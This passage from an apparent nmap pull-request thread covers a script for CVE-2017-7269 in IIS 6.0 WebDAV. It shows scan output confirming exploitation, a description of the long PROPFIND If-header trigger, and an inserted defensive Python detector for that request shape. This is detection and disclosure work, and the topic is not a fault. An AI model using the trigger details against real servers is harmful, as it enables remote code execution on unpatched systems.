|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7269
|       https://github.com/edwardz246003/IIS_exploit
|_      https://0patch.blogspot.in/2017/03/0patching-immortal-cve-2017-7269.html
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1039/tcp open  sbl
1041/tcp open  danf-ak2

Vulnerable machine with the port 8080 exposed:

1041/tcp open  danf-ak2
8080/tcp open  http-proxy
| iis-buffer-overflow:
|   VULNERABLE:
|   Buffer Overflow in IIS 6 and Windows Server 2003 R2
|     State: VULNERABLE (Exploitable)
|     IDs:  CVE:CVE-2017-7269
|     Risk factor: High  CVSS: 10.0
|       Buffer overflow in the ScStoragePathFromUrl function in the WebDAV service in Internet Information Services (IIS) 6.0
|       in Microsoft Windows Server 2003 R2 allows remote attackers to execute arbitrary code via a long header beginning
|       with "If: <http://" in a PROPFIND request, as exploited in the wild in July or August 2016.
|
|       Original exploit by Zhiniang Peng and Chen Wu.
|
|     Disclosure date: 2017-03-26
|     Exploit results:
|       HTTP/1.1 200 OK
|   Connection: close
|   Date: Fri, 02 Nov 2018 20:36:53 GMT
|   Server: Microsoft-IIS/6.0
|   Content-Length:26
|
|   HHIT CVE-2017-7269 Success
|   CVE-2017-7269
|     References:
|       https://0patch.blogspot.in/2017/03/0patching-immortal-cve-2017-7269.html
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7269
|_      https://github.com/edwardz246003/IIS_exploit

I think the exploit is definitely completed :)
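The two runs above show what the trigger looks like on the wire: a PROPFIND request whose If header begins with <http://, runs to several hundred bytes, and is made of non-ASCII bytes, far from the short lock-token lists a legitimate WebDAV client sends. The following is an added example, not part of this PR or of nmap, that parses raw HTTP requests and flags that shape so a defender can test a capture, a WAF rule or a log-replay pipeline against it. The threshold IF_HEADER_MAX_LEN and the three sample requests are constructed assumptions; the long sample only repeats one arbitrary multibyte character and carries none of the script's payload bytes.

```python
"""Flag PROPFIND requests shaped like the CVE-2017-7269 trigger.

Added example, not part of the nmap PR: the threshold and the sample
requests below are constructed assumptions, not values from the script.
"""
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Tuple

# Assumption: a legitimate WebDAV If header lists a handful of lock tokens and
# stays well under this size; the trigger needs a header of several hundred bytes.
IF_HEADER_MAX_LEN = 256


@dataclass
class Verdict:
    suspicious: bool
    reasons: List[str] = field(default_factory=list)


def parse_request(raw: bytes) -> Optional[Tuple[bytes, bytes, Dict[bytes, bytes]]]:
    """Split a raw HTTP/1.x request into (method, target, headers).

    Header names are lower-cased so that 'If', 'IF' and 'if' compare equal;
    values stay raw bytes because the trigger is not valid text.
    Returns None when the request line is malformed.
    """
    head, _sep, _body = raw.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    parts = lines[0].split(b" ", 2)
    if len(parts) != 3:
        return None
    method, target, _version = parts
    headers: Dict[bytes, bytes] = {}
    for line in lines[1:]:
        name, colon, value = line.partition(b":")
        if not colon:
            continue  # ignore lines that are not 'Name: value'
        headers[name.strip().lower()] = value.strip()
    return method, target, headers


def inspect_request(raw: bytes) -> Verdict:
    """Describe why (if at all) a request matches the trigger's traits.

    The CVE text on this page names a long If header beginning with '<http://'
    in a PROPFIND request; the exploit bytes are non-ASCII. Each trait is one
    reason, and two or more reasons make the request suspicious, because an
    If header that merely starts with <http://...> is normal WebDAV.
    """
    parsed = parse_request(raw)
    if parsed is None:
        return Verdict(False, ["malformed request line"])
    method, _target, headers = parsed
    if method.upper() != b"PROPFIND" or b"if" not in headers:
        return Verdict(False)
    if_value = headers[b"if"]
    reasons: List[str] = []
    if if_value.startswith(b"<http://"):
        reasons.append("If header begins with <http://")
    if len(if_value) > IF_HEADER_MAX_LEN:
        reasons.append(f"If header is {len(if_value)} bytes, over {IF_HEADER_MAX_LEN}")
    if any(byte > 0x7F for byte in if_value):
        reasons.append("If header contains non-ASCII bytes")
    return Verdict(len(reasons) >= 2, reasons)


def flag_requests(requests: List[bytes]) -> List[int]:
    """Indices of the requests in a batch that inspect_request marks suspicious."""
    return [i for i, raw in enumerate(requests) if inspect_request(raw).suspicious]


# Constructed samples (assumptions, not captures from the PR's test runs).
BENIGN_GET = b"GET /index.html HTTP/1.1\r\nHost: example.test\r\n\r\n"
BENIGN_PROPFIND = (
    b"PROPFIND /docs/ HTTP/1.1\r\nHost: example.test\r\nDepth: 0\r\n"
    b"If: <http://example.test/docs/> (<opaquelocktoken:constructed-token-1>)\r\n\r\n"
)
# Same shape as the trigger (PROPFIND, If starting with <http://, hundreds of
# non-ASCII bytes): a repeated U+6A29 chosen arbitrarily, not exploit bytes.
LONG_IF_PROPFIND = (
    b"PROPFIND / HTTP/1.1\r\nHost: localhost:8080\r\nContent-Length: 0\r\n"
    b"If: <http://localhost:8080/aaaaaaa" + "\u6a29".encode("utf-8") * 200 + b">\r\n\r\n"
)

if __name__ == "__main__":
    for name, raw in [("benign GET", BENIGN_GET), ("benign PROPFIND", BENIGN_PROPFIND),
                      ("long-If PROPFIND", LONG_IF_PROPFIND)]:
        verdict = inspect_request(raw)
        print(f"{name}: suspicious={verdict.suspicious} reasons={verdict.reasons}")
```

Requiring two traits keeps ordinary lock-token If headers out of the alert stream while still catching a request that has the trigger's length and byte profile on any port, which matches the page's point that the server may listen on 8080 or elsewhere rather than only 80.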

@rewanthtammana (Contributor, Author)

Thanks, @fakenine @tarraschk for your contribution.

@rewanthtammana (Contributor, Author) commented Nov 6, 2018

@bonsaiviking @cldrn @fyodor
The updated script is tested on both vulnerable and non-vulnerable machines and is working well. Even after executing the exploit script, the server is stable and fully functional.

Please look into the changes and acknowledge, so that I can commit the new NSE script into the current repo.

@tarraschk

Hey @rewanth1997: the CI build has failed, is that why we do not have answers from the maintainers?

@rewanthtammana (Contributor, Author)

They are busy integrating new features into nmap. Everything gets resolved/merged on a priority basis, and for now this is the lowest-priority feature that needs to be reviewed.


3 participants